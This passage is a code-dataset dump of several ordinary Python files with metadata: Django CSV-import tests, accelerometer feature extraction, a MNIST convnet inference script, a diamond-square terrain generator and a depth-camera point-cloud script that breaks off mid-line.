{"api_name": "tqdm.tqdm", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 34, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.img_to_array", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 65, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 
74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.show", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}]} +{"seq_id": "41081476881", "text": "from unittest.mock import patch, MagicMock,Mock\nimport pytest\nfrom apps.importacaocsv.import_csv import ImportFromCsv\nfrom apps.loja.models import Produtos,Fabricante\nimport pandas as pd\n\n@pytest.fixture\ndef mock_dados():\n mock_data = {\n 'manufacturer': ['Lenovo', 'Samsung'],\n 'model': ['iPhone', 'Galaxy'],\n 'color': ['black', 'white'],\n 'carrier_plan_type': ['postpaid', 'prepaid'],\n 'quantity': [1, 2],\n 'price': [1000.0, 500.0]\n }\n return mock_data\n\n@pytest.fixture\ndef columns_csv():\n columns=['manufacturer','model','color','carrier_plan_type','quantity','price']\n return columns\n\n\n@pytest.mark.django_db\nclass TestImportFromCsv:\n def setup_method(self):\n mock_arquivo = MagicMock()\n mock_arquivo.name = 'valid.csv'\n self.mock_arquivo = ImportFromCsv(arquivo=mock_arquivo)\n\n def test_erros_retonar_lista(self):\n mock_funcao = self.mock_arquivo\n mock_funcao.validar_dados_necessario = Mock(return_value=False)\n \n resultado = self.mock_arquivo.erros()\n \n assert type(resultado) == list\n assert mock_funcao.validar_dados_necessario.called\n \n def test_erros_retornar_false(self):\n mock_funcao = self.mock_arquivo\n mock_funcao.validar_dados_necessario = Mock(return_value=True)\n \n resultado = self.mock_arquivo.erros()\n \n assert resultado == False\n assert mock_funcao.validar_dados_necessario.called\n \n @patch('pandas.read_csv')\n def test_pega_dataframe_valido_retorna_pands_dataframe(self,read_csv_mock,columns_csv):\n read_csv_mock.return_value = pd.DataFrame([['apple', 's9', 'azul', 'pos', '450', '55.0']], columns=columns_csv)\n\n mock_funcao = self.mock_arquivo\n mock_funcao.validar_arquivo_extensao = Mock(return_value=True)\n \n resultado = self.mock_arquivo.pega_dataframe()\n\n assert isinstance(resultado,pd.DataFrame)\n assert mock_funcao.validar_arquivo_extensao.called\n \n def test_pega_dataframe_estensao_invalido_retornar_msg_arquivo_invalido(self):\n mock_funcao = self.mock_arquivo\n mock_funcao.validar_arquivo_extensao = Mock(return_value=False)\n \n resultado = self.mock_arquivo.pega_dataframe()\n\n assert resultado == 'Arquivo invalido'\n assert mock_funcao.validar_arquivo_extensao.called\n \n @patch('pandas.read_csv')\n def test_pega_dataframe_estensao_valido_com_colunas_faltando_retornando_str(self,read_csv_mock):\n read_csv_mock.side_effect = ValueError()\n mock_funcao = self.mock_arquivo\n mock_funcao.validar_arquivo_extensao = Mock(return_value=True)\n \n resultado = self.mock_arquivo.pega_dataframe() \n\n 
assert isinstance(resultado, str)\n assert mock_funcao.validar_arquivo_extensao.called\n \n def test_validar_arquivo_extensao_valido_retornar_true(self):\n resultado = self.mock_arquivo.validar_arquivo_extensao()\n assert resultado == True\n \n def test_validar_arquivo_extensao_invalido_retornar_false(self):\n mock_arquivo = MagicMock()\n mock_arquivo.name = 'valid.txt'\n \n entrada = ImportFromCsv(mock_arquivo)\n resultado = entrada.validar_arquivo_extensao() \n \n assert resultado == False\n\n @pytest.mark.parametrize('dados',[\n ['apple', 's9', 'azul', 'pos', '450', '55.0']\n ])\n def test_validar_dados_necessario_arquivo_tipo_dataframe_valido_retornar_true_e_adicionando_dataframe(self,dados,columns_csv):\n mock_funcao = self.mock_arquivo\n mock_funcao.pega_dataframe = Mock(return_value=(pd.DataFrame([dados], columns=columns_csv)))\n \n resultado = self.mock_arquivo.validar_dados_necessario()\n\n assert resultado == True\n assert isinstance(self.mock_arquivo.dataframe,pd.DataFrame)\n assert mock_funcao.pega_dataframe.called\n\n def test_validar_dados_necessario_arquivo_invalido_retornar_false_e_adicionando_msg_error(self):\n mock_funcao = self.mock_arquivo\n mock_funcao.pega_dataframe = Mock(return_value=False)\n \n resultado = self.mock_arquivo.validar_dados_necessario()\n\n assert resultado == False\n assert len(self.mock_arquivo.error) == 1 \n assert mock_funcao.pega_dataframe.called\n\n @pytest.mark.parametrize('dados',[\n ['apple', 's9', 'azul', 'pos', 'a450', '55.0']])\n def test_validar_dados_necessario_contem_erros_retornando_false(self,dados,columns_csv):\n mock_funcao = self.mock_arquivo\n mock_funcao.pega_dataframe = Mock(return_value=pd.DataFrame([dados],columns=columns_csv))\n\n resultado = self.mock_arquivo.validar_dados_necessario()\n\n assert resultado == False\n assert len(self.mock_arquivo.error) == 2\n\n @pytest.mark.parametrize('dados',[\n ['apple', 's9', 'azul', 'pos', 'a450', '55.0']])\n def test_save_dataframe_nao_e_none_retornar_true(self,dados,columns_csv):\n dataframe = pd.DataFrame([dados],columns=columns_csv)\n mock_parametro = self.mock_arquivo\n mock_parametro.dataframe = MagicMock(return_value=dataframe)\n \n resultado = self.mock_arquivo.save()\n\n assert resultado == True\n \n def test_save_dataframe_e_none_retornar_false(self):\n resultado = self.mock_arquivo.save()\n\n assert resultado == False\n\n def test_save_fabricante_get_or_create_retorna_2_objetos_criado_e_com_a_dado_ja_criado_e_outra_com_samsung(self,mock_dados,fabricante_factory):\n fabricante = fabricante_factory.create()\n mock_parametro = self.mock_arquivo\n mock_parametro.dataframe = pd.DataFrame(data=mock_dados)\n\n self.mock_arquivo.save()\n\n assert len(Fabricante.objects.all()) == 2 \n assert Fabricante.objects.get(id=1) == fabricante\n assert Fabricante.objects.get(id=2).fabricante == 'Samsung'\n\n def test_save_produtos_filter_encontrado_retornando_so_2_banco_de_dados_e_alterando_price_e_quantidade(self,mock_dados,produto_factory):\n produto = produto_factory.create()\n\n mock_parametro = self.mock_arquivo\n mock_parametro.dataframe = pd.DataFrame(data=mock_dados)\n self.mock_arquivo.save()\n \n entrada = Produtos.objects.get(id=1)\n \n assert len(Produtos.objects.all()) == 2\n assert entrada == produto\n assert entrada.price == 1000\n assert entrada.quantity == 4\n ", "repo_name": "Duarts-D/loja-importacao_csv", "sub_path": "apps/importacaocsv/tests/test_import_csv.py", "file_name": "test_import_csv.py", "file_ext": "py", "file_size_in_byte": 6499, "program_lang": "python", "lang": 
"pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytest.fixture", "line_number": 7, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 19, "usage_type": "attribute"}, {"api_name": "unittest.mock.MagicMock", "line_number": 28, "usage_type": "call"}, {"api_name": "apps.importacaocsv.import_csv.ImportFromCsv", "line_number": 30, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 34, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 43, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 52, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 55, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 59, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 50, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 64, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 75, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 71, "usage_type": "call"}, {"api_name": "unittest.mock.MagicMock", "line_number": 87, "usage_type": "call"}, {"api_name": "apps.importacaocsv.import_csv.ImportFromCsv", "line_number": 90, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 100, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 100, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 95, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 95, "usage_type": "attribute"}, {"api_name": "unittest.mock.Mock", "line_number": 110, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 122, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 122, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 118, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 118, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 132, "usage_type": "call"}, {"api_name": "unittest.mock.MagicMock", "line_number": 134, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 129, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 129, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 148, "usage_type": "call"}, {"api_name": "apps.loja.models.Fabricante.objects.all", "line_number": 152, "usage_type": "call"}, {"api_name": "apps.loja.models.Fabricante.objects", "line_number": 152, "usage_type": "attribute"}, {"api_name": "apps.loja.models.Fabricante", "line_number": 152, "usage_type": "name"}, {"api_name": "apps.loja.models.Fabricante.objects.get", "line_number": 153, "usage_type": "call"}, {"api_name": "apps.loja.models.Fabricante.objects", "line_number": 153, "usage_type": "attribute"}, {"api_name": "apps.loja.models.Fabricante", "line_number": 153, "usage_type": "name"}, {"api_name": "apps.loja.models.Fabricante.objects.get", "line_number": 154, "usage_type": "call"}, {"api_name": "apps.loja.models.Fabricante.objects", "line_number": 154, "usage_type": "attribute"}, {"api_name": "apps.loja.models.Fabricante", "line_number": 154, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 160, "usage_type": "call"}, {"api_name": "apps.loja.models.Produtos.objects.get", "line_number": 163, "usage_type": "call"}, {"api_name": 
"apps.loja.models.Produtos.objects", "line_number": 163, "usage_type": "attribute"}, {"api_name": "apps.loja.models.Produtos", "line_number": 163, "usage_type": "name"}, {"api_name": "apps.loja.models.Produtos.objects.all", "line_number": 165, "usage_type": "call"}, {"api_name": "apps.loja.models.Produtos.objects", "line_number": 165, "usage_type": "attribute"}, {"api_name": "apps.loja.models.Produtos", "line_number": 165, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 25, "usage_type": "attribute"}]} +{"seq_id": "43151149391", "text": "import pandas as pd\nimport numpy as np \nfrom scipy import stats\nfrom scipy.signal import find_peaks\n\ndef features_extract (df, accx, accy, accz, activity, window_size, step_size): \n # features based on accx, accy, accz\n x_list = []\n y_list = []\n z_list = []\n labels = []\n\n # overlapping windows\n for i in range(0, len(df) - window_size + 1, step_size):\n # arrays per axis\n xs = df[accx].values[i: i + window_size]\n ys = df[accy].values[i: i + window_size]\n zs = df[accz].values[i: i + window_size]\n\n # label with most occurrences in window\n input_array = np.array(df[activity][i: i + window_size], dtype=float)\n label = stats.mode(input_array)[0]\n\n x_list.append(xs)\n y_list.append(ys)\n z_list.append(zs)\n labels.append(label)\n\n # converting the lists to series\n x_series_td = pd.Series(x_list)\n y_series_td = pd.Series(y_list)\n z_series_td = pd.Series(z_list)\n\n # converting the signals from time domain to frequency domain using FFT\n fft_size = int((window_size/2)) + 1\n\n x_series_fft = x_series_td.apply(lambda x: np.abs(np.fft.fft(x))[1:fft_size])\n y_series_fft = y_series_td.apply(lambda x: np.abs(np.fft.fft(x))[1:fft_size])\n z_series_fft = z_series_td.apply(lambda x: np.abs(np.fft.fft(x))[1:fft_size])\n\n X = pd.DataFrame()\n y = np.array(labels)\n y = y.astype(int)\n\n for tp in ['td', 'fft']:\n\n for axis in ['x','y','z']:\n \n series = locals()[f'{axis}_series_{tp}']\n\n ################## simple statistics features ##################\n # mean\n X[f'{axis}_mean_{tp}'] = series.apply(lambda x: x.mean())\n # mean abs diff\n X[f'{axis}_meandiff_{tp}'] = series.apply(lambda x: np.mean(np.absolute(x - np.mean(x))))\n # min\n X[f'{axis}_min_{tp}'] = series.apply(lambda x: x.min())\n # max\n X[f'{axis}_max_{tp}'] = series.apply(lambda x: x.max()) \n # max-min diff\n X[f'{axis}_minmax_{tp}'] = X[f'{axis}_max_{tp}'] - X[f'{axis}_min_{tp}']\n # median\n X[f'{axis}_median_{tp}'] = series.apply(lambda x: np.median(x))\n # median abs diff \n X[f'{axis}_mediandiff_{tp}'] = series.apply(lambda x: np.median(np.absolute(x - np.median(x))))\n # std dev\n X[f'{axis}_std_{tp}'] = series.apply(lambda x: x.std())\n # interquartile range\n X[f'{axis}_quart_{tp}'] = series.apply(lambda x: np.percentile(x, 75) - np.percentile(x, 25))\n\n # indexes\n # index of min value in window\n if tp == 'td':\n X[f'{axis}_argmin_{tp}'] = series.apply(lambda x: np.argmin(x))\n # index of max value in window\n X[f'{axis}_argmax_{tp}'] = series.apply(lambda x: np.argmax(x))\n else:\n X[f'{axis}_argmin_{tp}'] = series.apply(lambda x: np.argmin(np.abs(np.fft.fft(x))[1:fft_size]))\n # index of max value in window\n X[f'{axis}_argmax_{tp}'] = series.apply(lambda x: np.argmax(np.abs(np.fft.fft(x))[1:fft_size]))\n \n # abs max-min index diff\n X[f'{axis}_minmaxarg_{tp}'] = abs(X[f'{axis}_argmax_{tp}'] - X[f'{axis}_argmin_{tp}'])\n \n # only for time domain\n if tp == 'td': \n # negtive values count\n X[f'{axis}_negatives_{tp}'] = series.apply(lambda x: 
np.sum(x < 0))\n # positive values count\n X[f'{axis}_positives_{tp}'] = series.apply(lambda x: np.sum(x > 0))\n \n # values above mean\n X[f'{axis}_meanabove_{tp}'] = series.apply(lambda x: np.sum(x > x.mean()))\n # skewness\n X[f'{axis}_skewness_{tp}'] = series.apply(lambda x: stats.skew(x))\n # kurtosis\n X[f'{axis}_kurtosis_{tp}'] = series.apply(lambda x: stats.kurtosis(x))\n\n\n ################## signal based features ##################\n # count peaks in signal\n X[f'{axis}_peaks_{tp}'] = series.apply(lambda x: len(find_peaks(x)[0]))\n # power of signal: average of the squared signal\n X[f'{axis}_power_{tp}'] = series.apply(lambda x: np.mean(x**2))\n \n # over all axis\n seriesx = locals()[f'x_series_{tp}']\n seriesy = locals()[f'y_series_{tp}']\n seriesz = locals()[f'z_series_{tp}']\n\n # signal magnitude area\n X[f'SMA_{tp}'] = seriesx.apply(lambda x: np.mean(abs(x))) + seriesy.apply(lambda x: np.mean(abs(x))) + seriesz.apply(lambda x: np.mean(abs(x)))\n\n # avg resultant\n X[f'avg_result_accl_{tp}'] = [i.mean() for i in ((seriesx**2 + seriesy**2 + seriesz**2)**0.5)]\n\n return X, y", "repo_name": "ylekka/thesisYL", "sub_path": "AR_features_extract.py", "file_name": "AR_features_extract.py", "file_ext": "py", "file_size_in_byte": 4834, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "scipy.stats.mode", "line_number": 22, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 22, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 78, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.abs", 
"line_number": 80, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 80, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 93, "usage_type": "call"}, {"api_name": "scipy.stats.skew", "line_number": 95, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 95, "usage_type": "name"}, {"api_name": "scipy.stats.kurtosis", "line_number": 97, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 97, "usage_type": "name"}, {"api_name": "scipy.signal.find_peaks", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 112, "usage_type": "call"}]} +{"seq_id": "36186750258", "text": "# coding: utf-8\nimport sys, os\nsys.path.append(os.pardir) # 부모 디렉터리의 파일을 가져올 수 있도록 설정\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom dataset.mnist import load_mnist\nfrom simple_convnet import SimpleConvNet\nfrom common.trainer import Trainer\n\n# 데이터 읽기\n(x_train, t_train), (x_test, t_test) = load_mnist(flatten=False)\n\n# 시간이 오래 걸릴 경우 데이터를 줄인다.\n#x_train, t_train = x_train[:5000], t_train[:5000]\n#x_test, t_test = x_test[:1000], t_test[:1000]\n\nmax_epochs = 20\n\nnetwork = SimpleConvNet(input_dim=(1,28,28), \n conv_param = {'filter_num': 30, 'filter_size': 5, 'pad': 0, 'stride': 1},\n hidden_size=100, output_size=10, weight_init_std=0.01)\n\n# 파라미터 저장\npath_dir = './ckpt'\nfile_name = \"simple_convnet_params.pkl\"\nif not os.path.isdir(path_dir):\n os.mkdir(path_dir)\n\nprint(\"Load Network Parameters!\")\nnetwork.load_params(os.path.join(path_dir, file_name))\n\ntest_acc = network.accuracy(x_test, t_test)\nprint(\"test acc | \", format(test_acc*100, \".2f\"), '%')\n", "repo_name": "idsdlab/basicai_fa23", "sub_path": "week13_lab/mnist/inference_simple_convnet_mnist.py", "file_name": "inference_simple_convnet_mnist.py", "file_ext": "py", "file_size_in_byte": 1099, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "os.pardir", "line_number": 3, "usage_type": "attribute"}, {"api_name": "dataset.mnist.load_mnist", "line_number": 11, "usage_type": "call"}, {"api_name": "simple_convnet.SimpleConvNet", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}]} +{"seq_id": "35448366707", "text": "#!/usr/bin/python3\n\nimport argparse\nimport math\nimport random\n\nimport numpy\nfrom PIL import Image\n\ndef scaled_random(mag):\n return (2 * random.random() - 1.0) * mag\n\ndef diamond(array, x, y, size, mag):\n \"\"\"For each square in the array, set the midpoint of that square to be the\n average of the four corner points plus a random value.\n \"\"\"\n half = size // 2\n\n x1 = x + size\n y1 = y + size\n\n a = array[x, y]\n b = array[x1, y]\n c = array[x1, y1]\n d = array[x, y1]\n\n array[x + half, y + 
half] = (a + b + c + d) / 4.0 + scaled_random(mag)\n\ndef square(array, x, y, size, mag):\n \"\"\"For each diamond in the array, set the midpoint of that diamond to be\n the average of the four corner points plus a random value. \"\"\"\n\n x1 = x - size\n y1 = y - size\n x2 = x + size\n y2 = y + size\n\n div = 4.0\n\n l = len(array)\n\n if x1 >= 0:\n a = array[x1, y]\n else:\n a = 0.0\n div -= 1.0\n if y1 >= 0:\n b = array[x, y1]\n else:\n b = 0.0\n div -= 1.0\n if x2 < l:\n c = array[x2, y]\n else:\n c = 0.0\n div -= 1.0\n if y2 < l:\n d = array[x, y2]\n else:\n d = 0.0\n div -= 1.0\n\n if div:\n array[x, y] = (a + b + c + d) / div + scaled_random(mag)\n\ndef diamond_square(array, step, mag, red):\n if step < 2:\n return\n\n l = len(array) - 1\n half = step // 2\n\n for x in range(0, l, step):\n for y in range(0, l, step):\n diamond(array, x, y, step, mag)\n\n for x in range(0, l + 1, step):\n for y in range(0, l + 1, step):\n if x < l:\n square(array, x + half, y, half, mag)\n if y < l:\n square(array, x, y + half, half, mag)\n\n mag *= red\n\n diamond_square(array, half, mag, red)\n\ndef main():\n parser = argparse.ArgumentParser(\"Diamond-square terrain generator\")\n parser.add_argument(\"--seed\", type=int, default=None,\n help=\"Random seed\")\n parser.add_argument(\"--size\", type=int, default=256,\n help=\"Image size (rounded up to power of 2)\")\n parser.add_argument(\"filename\", nargs=1,\n help=\"Target file name\")\n args = parser.parse_args()\n\n if args.size < 2:\n args.size = 2\n else:\n args.size = 2 ** int(math.log2(args.size - 1) + 1)\n\n if args.seed:\n random.seed(args.seed)\n else:\n random.seed()\n\n array = numpy.zeros((args.size + 1, args.size + 1), dtype=numpy.float32)\n\n array[0,0] = scaled_random(2)\n array[0,args.size] = scaled_random(2)\n array[args.size,0] = scaled_random(2)\n array[args.size,args.size] = scaled_random(2)\n\n diamond_square(array, args.size, 1.0, 0.5)\n\n minimum = numpy.amin(array)\n maximum = numpy.amax(array)\n\n array -= minimum\n maximum -= minimum\n\n array = array * (255.0 / maximum)\n\n barray = numpy.array(array, dtype=numpy.ubyte)\n\n im = Image.frombuffer(\"L\", (args.size + 1, args.size + 1),\n memoryview(barray), \"raw\", \"L\", 0, 1)\n im = im.crop((0, 0, args.size, args.size))\n\n px = im.load()\n\n im.save(args.filename[0])\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "Jajcus/vulkanplay", "sub_path": "utils/diamond_square.py", "file_name": "diamond_square.py", "file_ext": "py", "file_size_in_byte": 3199, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.random", "line_number": 11, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 89, "usage_type": "call"}, {"api_name": "math.log2", "line_number": 101, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 104, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 108, "usage_type": "attribute"}, {"api_name": "numpy.amin", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.ubyte", "line_number": 125, "usage_type": "attribute"}, {"api_name": "PIL.Image.frombuffer", "line_number": 127, "usage_type": "call"}, {"api_name": "PIL.Image", 
"line_number": 127, "usage_type": "name"}]} +{"seq_id": "32395300060", "text": "# TODO:给定图像的关键点坐标,根据深度相机得到三���空间坐标\n# 目的是为了模型注册\n\n# 输入: 图片\n# 输出: 3d点\n# 规定图像尺度为像素\n# 实际坐标的尺度为mm\n\nimport pyrealsense2 as rs\nfrom numpy import *\nimport numpy as np\n\nimport open3d as o3d\nimport cv2\n\nimport os\nimport time\nfrom enum import IntEnum\n\nfrom o3d_pose_lib import *\n\nnp.set_printoptions(suppress=True)\n\n\n# 这个是将整个深度图转为点云\ndef get_cloud_xyz(depth, scale, u0, v0, fx, fy):\n global xmap, ymap\n zmap = depth.flatten()\n\n print('xmap:', xmap.shape)\n print('ymap:', ymap.shape)\n print('zmap:', zmap.shape)\n\n # Z = zmap * scale\n Z = zmap\n X = (xmap - v0) * Z / fx\n Y = (ymap - u0) * Z / fy\n\n X = X[:, newaxis].astype(np.float32)\n Y = Y[:, newaxis].astype(np.float32)\n Z = Z[:, newaxis].astype(np.float32)\n\n cloud = np.concatenate((X, Y, Z), axis=1)\n\n return cloud\n\n\n# 添加颜色 问题:有一点对齐误差\ndef get_cloud_xyzrgb(depth, color, scale, u0, v0, fx, fy):\n global xmap, ymap\n\n # zmap = depth.flatten()\n zmap = depth.reshape(-1)\n # Z = zmap * scale # 乘 就变成了m为单位\n Z = zmap\n Y = (xmap - v0) * Z / fy # 因为检索时xy实际上是y行x列\n X = (ymap - u0) * Z / fx\n\n X = X[:, newaxis].astype(np.float32) # 可以优化\n Y = Y[:, newaxis].astype(np.float32)\n Z = Z[:, newaxis].astype(np.float32)\n cloud = np.concatenate((X, Y, Z), axis=1) # 拼接坐标\n\n # colors\n rgbs = color.reshape(-1, 3)\n\n return cloud, rgbs / 255\n\n\n# 将单个xyZ转为XYZ 图像坐标-》相机坐标\ndef get_xyz(pix, Z, u0, v0, fx, fy): # (x,y)\n Y = (pix[0] - v0) / fy * Z\n X = (pix[1] - u0) / fx * Z\n pt_w = np.array([X, Y, Z])\n return pt_w\n\n\nif __name__ == \"__main__\":\n\n # 参数设置\n\n # 画幅\n # width = 1280\n # height = 720\n\n width = 512\n height = 424\n\n # 最简单的测试:给定一个xyz,得到XYZ\n # 像素坐标映射\n xmap, ymap = mgrid[0:height, 0:width] # 前面是行范围 后面是列范围 对应到图像坐标,则xmap是y范围\n xmap, ymap = xmap.flatten(), ymap.flatten()\n\n # Getting the depth sensor's depth scale (see rs-align example for explanation)\n depth_scale = 0.001\n print('depth_scale:', depth_scale)\n\n # We will not display the background of objects more than\n # clipping_distance_in_meters meters away\n clipping_distance_in_meters = 3 # 阈值 meter\n clipping_distance = clipping_distance_in_meters / depth_scale\n\n # Create an align object\n # align_to = rs.stream.color # 将depth对齐到color\n # align = rs.align(align_to)\n\n # 内参 ----------------------\n # intrinsic = get_intrinsic_matrix(color_frame)\n # print(intrinsic)\n # u0, v0 = intrinsic.ppx, intrinsic.ppy\n # fx, fy = intrinsic.fx, intrinsic.fy\n u0, v0 = width / 2, height / 2\n fx, fy = 0.001, 0.001\n\n dist_coeffs = zeros((4, 1)) # Assuming no lens distortion\n\n # 保存内参\n # intrinsic_mat = np.array([[fx, 0, u0],\n # [0, fy, v0],\n # [0, 0, 1]])\n\n # OPEN3D begain ---------------------\n vis = o3d.visualization.Visualizer()\n vis.create_window(window_name='ANTenna3D')\n\n # 设置窗口背景颜色\n opt = vis.get_render_option()\n opt.background_color = np.asarray([0, 0., 0.0]) # up to 1\n # print(dir(opt))\n\n pcd = o3d.geometry.PointCloud()\n flip_transform = [[1, 0, 0, 0], [0, -1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]]\n\n coord = o3d.geometry.TriangleMesh.create_coordinate_frame(origin=[0, 0, 0], size=0.1) # 